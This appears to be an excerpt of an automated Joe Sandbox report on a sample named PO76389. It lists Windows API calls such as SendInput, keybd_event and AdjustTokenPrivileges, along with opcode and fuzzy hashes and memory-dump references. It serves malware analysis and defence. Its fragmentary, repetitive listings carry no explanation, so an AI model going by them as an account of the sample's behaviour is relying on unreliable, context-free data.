                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                    • String ID:
                                                    • API String ID: 599397726-0
                                                    • Opcode ID: f4e819cb6f5ff40cbf28e69ab35b805c18c9c271cb561479e9780d00d107f6b5
                                                    • Instruction ID: a1bcb6bd33f0d54d8b91b1aa0059e3f9a7ca82bb71bc1f764538ab369229c2bd
                                                    • Opcode Fuzzy Hash: f4e819cb6f5ff40cbf28e69ab35b805c18c9c271cb561479e9780d00d107f6b5
                                                    • Instruction Fuzzy Hash: BB41C171500A09BFEB109A91DC85FBFBBBDFB80758F10442EF605A62C0FA719E419E64
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 004FEA95
                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 004FEAEF
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 004FEB3C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DiskFreeSpace
                                                    • String ID:
                                                    • API String ID: 1682464887-0
                                                    • Opcode ID: 59ab0f869293d2964e39c33e3b66ed84f612ee9d1091fbed0b8afe149079fd0a
                                                    • Instruction ID: faf0b1c6fbe5461e1a7abf7141929731f0d5012fa4a7755f5ded6eae68565b46
                                                    • Opcode Fuzzy Hash: 59ab0f869293d2964e39c33e3b66ed84f612ee9d1091fbed0b8afe149079fd0a
                                                    • Instruction Fuzzy Hash: 7B217F35A00208EFCB00DFA6D884AEEBBB4FF48314F14809AE505A7351DB759905CB54
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004F704C
                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 004F708D
                                                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004F7098
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                    • String ID:
                                                    • API String ID: 33631002-0
                                                    • Opcode ID: 332754e47ec70ba6b61ccef73aadf930f5728ab5351e6a2fba1e957b1cac1c1c
                                                    • Instruction ID: 75eb93b7a674d4d2271690b37e7b3af752799af24eff512f6476961235c7e84a
                                                    • Opcode Fuzzy Hash: 332754e47ec70ba6b61ccef73aadf930f5728ab5351e6a2fba1e957b1cac1c1c
                                                    • Instruction Fuzzy Hash: 1E113C71A00228BFEB108BA4EC45AAFBBBCEB45B10F104152FA00E7290D6745A059BA5
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                      • Part of subcall function 004CB155: GetWindowLongW.USER32(?,000000EB), ref: 004CB166
                                                    • GetParent.USER32(?), ref: 0052F4B5
                                                    • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,004CADDD,?,?,?,00000006,?), ref: 0052F52F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$DialogNtdllParentProc_
                                                    • String ID:
                                                    • API String ID: 314495775-0
                                                    • Opcode ID: 665353b159a5e2802c3d29222b2cbc063adf209f1a85652654f22630b2aea3e1
                                                    • Instruction ID: 70aaf6b49dc8506fdecd5f29a516291d09de56d9ff0d64df95a22e25421538d7
                                                    • Opcode Fuzzy Hash: 665353b159a5e2802c3d29222b2cbc063adf209f1a85652654f22630b2aea3e1
                                                    • Instruction Fuzzy Hash: 1321D539200514AFCB649F29E849FAB3BA2EF06364F18426DF1394B3E2C7345D11E795
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004FFD71
                                                    • FindClose.KERNEL32(00000000), ref: 004FFDA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID:
                                                    • API String ID: 2295610775-0
                                                    • Opcode ID: 9f0b087fdaf3a613005a7bf48bdf50dd5e15dce2225b4d37507786c0e5582eba
                                                    • Instruction ID: 3ba307f5f602dc2318391a3208ab3182383c1511d4261d261c77ca99c7dc8cb6
                                                    • Opcode Fuzzy Hash: 9f0b087fdaf3a613005a7bf48bdf50dd5e15dce2225b4d37507786c0e5582eba
                                                    • Instruction Fuzzy Hash: C811A1316102059FD700EF29D845A2AF7E8FF84324F00851EF9A59B391DB74EC05CB99
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                    • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0052F352,?,?,?), ref: 0051F115
                                                      • Part of subcall function 004CB155: GetWindowLongW.USER32(?,000000EB), ref: 004CB166
                                                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0051F0FB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                    • String ID:
                                                    • API String ID: 1273190321-0
                                                    • Opcode ID: 2467caedb406f2ddbbb1161dc8441fd27500b8a16ff4be8bde95e1f61c9cf0ce
                                                    • Instruction ID: cdc5f56b5fdcfa3588143705caaf84f1b7c377d0d729a2dd5e1537cb02e6f4de
                                                    • Opcode Fuzzy Hash: 2467caedb406f2ddbbb1161dc8441fd27500b8a16ff4be8bde95e1f61c9cf0ce
                                                    • Instruction Fuzzy Hash: 4901D831204604FBDB219F18EC49FA63FB6FB85364F184528F8150B2E1C7329856EB61
                                                    APIs
                                                    • ClientToScreen.USER32(?,?), ref: 0051F47D
                                                    • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0052F42E,?,?,?,?,?), ref: 0051F4A6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ClientDialogNtdllProc_Screen
                                                    • String ID:
                                                    • API String ID: 3420055661-0
                                                    • Opcode ID: 780ad96c0dad31bd9ede6fe96b3dff5d65fcbecb6615d1b7ad0fac24d6153d21
                                                    • Instruction ID: ccfb802d65a9ba3edfb279d5bcc3a714952ee9467eaab63eb7c7a3ac550f4b4c
                                                    • Opcode Fuzzy Hash: 780ad96c0dad31bd9ede6fe96b3dff5d65fcbecb6615d1b7ad0fac24d6153d21
                                                    • Instruction Fuzzy Hash: 53F03A72400118FFEF049F95EC099AE7FB8FF54351F10405AFA02A2160D3B5AA55EB60
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0050C2E2,?,?,00000000,?), ref: 004FD73F
                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0050C2E2,?,?,00000000,?), ref: 004FD751
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ErrorFormatLastMessage
                                                    • String ID:
                                                    • API String ID: 3479602957-0
                                                    • Opcode ID: 6624a8c4b7d9df03ee7637a381ffedc4933e09d259b4295d3432bb52133fa4c4
                                                    • Instruction ID: 25adeb4a2d2fbaf6a79dacc5a1def1a59d3fb017eb18bd539ff102bc2b1bdba4
                                                    • Opcode Fuzzy Hash: 6624a8c4b7d9df03ee7637a381ffedc4933e09d259b4295d3432bb52133fa4c4
                                                    • Instruction Fuzzy Hash: F5F0E23540032DEBDB10AFA4CC88FEB77BDAF49351F008416B905D6181D274D940DBB4
                                                    APIs
                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 004F4B89
                                                    • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 004F4B9C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: InputSendkeybd_event
                                                    • String ID:
                                                    • API String ID: 3536248340-0
                                                    • Opcode ID: 092b47b44b191ca5a7a33513ee523c8abf7920c12ee4d35d1acc4aa36286586c
                                                    • Instruction ID: b659d86d1eb6a4ba456d598dafd8971103e38cd14e4fc04e2f0064f66a5957b4
                                                    • Opcode Fuzzy Hash: 092b47b44b191ca5a7a33513ee523c8abf7920c12ee4d35d1acc4aa36286586c
                                                    • Instruction Fuzzy Hash: 8DF0907080034DAFDB058FA0C805BBE7BB4EF00305F00840AFD51A6292D779D616EFA4
                                                    APIs
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004EB9EC), ref: 004EB8C5
                                                    • CloseHandle.KERNEL32(?,?,004EB9EC), ref: 004EB8D7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                    • String ID:
                                                    • API String ID: 81990902-0
                                                    • Opcode ID: 14c1f999b5e1e8f36c43bf9444ade2a8ea2484de9cd74726370fa241b0e946de
                                                    • Instruction ID: cff0c150c746e4c50f038c0925a22c16871ca69a26a217c3ae45a6a012a97d47
                                                    • Opcode Fuzzy Hash: 14c1f999b5e1e8f36c43bf9444ade2a8ea2484de9cd74726370fa241b0e946de
                                                    • Instruction Fuzzy Hash: DEE09A71004511AEE7262B51EC0996777FDEF04315B10851AB45581570D7665C94EB64
                                                    APIs
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0051F59C
                                                    • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0052F3AD,?,?,?,?), ref: 0051F5C6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: DialogLongNtdllProc_Window
                                                    • String ID:
                                                    • API String ID: 2065330234-0
                                                    • Opcode ID: f9a3ab751b409d84d2741c3e833e909371ec56f808ee1b54f953332df0f5c057
                                                    • Instruction ID: efafb12ee2e6dc96b8fbce523b1436ea19ce968c665ff36a2c6bab9af8b578ff
                                                    • Opcode Fuzzy Hash: f9a3ab751b409d84d2741c3e833e909371ec56f808ee1b54f953332df0f5c057
                                                    • Instruction Fuzzy Hash: 8AE04630104218BBEB140F09EC0AFB93A69FB00B50F108926F916880E0D7B188A0E660
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,004B125D,004D7A43,004B0F35,?,?,00000001), ref: 004D8E41
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004D8E4A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 272f67a49063f2b821266377434a100e451c77e75c3d79590908ba3f269742a0
                                                    • Instruction ID: 5dd64676e5723fe3a5425e27f4b4a7b4d8d9ca5f3db53535470390ad1cbd1d48
                                                    • Opcode Fuzzy Hash: 272f67a49063f2b821266377434a100e451c77e75c3d79590908ba3f269742a0
                                                    • Instruction Fuzzy Hash: 5EB09271044A08ABEA802BA1FC09B883F78EB18A62F004410F61D852608B635854AAA2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID:
                                                    • API String ID: 3964851224-0
                                                    • Opcode ID: 1560927b6bde47dc76ee9e4651da43f39eedd49f6213eb8914ed4dfae072f7b7
                                                    • Instruction ID: 703aeabff22674577a4587a35b7399fb203890259f54c81e2e915c8c5aff9a29
                                                    • Opcode Fuzzy Hash: 1560927b6bde47dc76ee9e4651da43f39eedd49f6213eb8914ed4dfae072f7b7
                                                    • Instruction Fuzzy Hash: 13929C746083018FD764DF19C490F6ABBE0BF89308F14885EE98A8B392D779ED45CB56
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 686410f650a5d93ae00e0702a561ee1009ad979be5a2926bd42764179638f85e
                                                    • Instruction ID: 4aa2e26c58c16edbd6f41b1477648079159f75888e43c29bd733d6f2d9f7ff91
                                                    • Opcode Fuzzy Hash: 686410f650a5d93ae00e0702a561ee1009ad979be5a2926bd42764179638f85e
                                                    • Instruction Fuzzy Hash: 2FB1E024D2AF504ED62396398835336B75CAFBB2C9F91D71BFC2A70D22FB2185875180
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                    • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00520352
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: DialogLongNtdllProc_Window
                                                    • String ID:
                                                    • API String ID: 2065330234-0
                                                    • Opcode ID: 6d6a303898dc02ac78fdba633dd859e36d5c4ecb0cbc53c022b78fe2865d1a40
                                                    • Instruction ID: 311c6b77ea1a89adf2f21d5a563f68e72962a8ff47e6c486cc77475889d61ce3
                                                    • Opcode Fuzzy Hash: 6d6a303898dc02ac78fdba633dd859e36d5c4ecb0cbc53c022b78fe2865d1a40
                                                    • Instruction Fuzzy Hash: 0C112731205235ABFB249B2CEC49FB93F24FF56720F244719F9215A1E3CA605D40E2A9
                                                    APIs
                                                      • Part of subcall function 004CB155: GetWindowLongW.USER32(?,000000EB), ref: 004CB166
                                                    • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 0051E7AF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$CallLongProc
                                                    • String ID:
                                                    • API String ID: 4084987330-0
                                                    • Opcode ID: a969d6d6ed1c03b3ed0e876eba032d46f51082db0b1e1bae0cc91804c3863d77
                                                    • Instruction ID: 5c60c03e35d8d4781cf031180c8c9bd5f3bd64b50c9320d6da335b942e640e16
                                                    • Opcode Fuzzy Hash: a969d6d6ed1c03b3ed0e876eba032d46f51082db0b1e1bae0cc91804c3863d77
                                                    • Instruction Fuzzy Hash: 4DF0EC36100149AFEF05AF54EC45DB93FA6FB04361B048518FD159A6A1CB329DA0EBA5
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                      • Part of subcall function 004CB736: GetCursorPos.USER32(000000FF), ref: 004CB749
                                                      • Part of subcall function 004CB736: ScreenToClient.USER32(00000000,000000FF), ref: 004CB766
                                                      • Part of subcall function 004CB736: GetAsyncKeyState.USER32(00000001), ref: 004CB78B
                                                      • Part of subcall function 004CB736: GetAsyncKeyState.USER32(00000002), ref: 004CB799
                                                    • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,0052F417,?,?,?,?,?,00000001,?), ref: 0051EA9C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
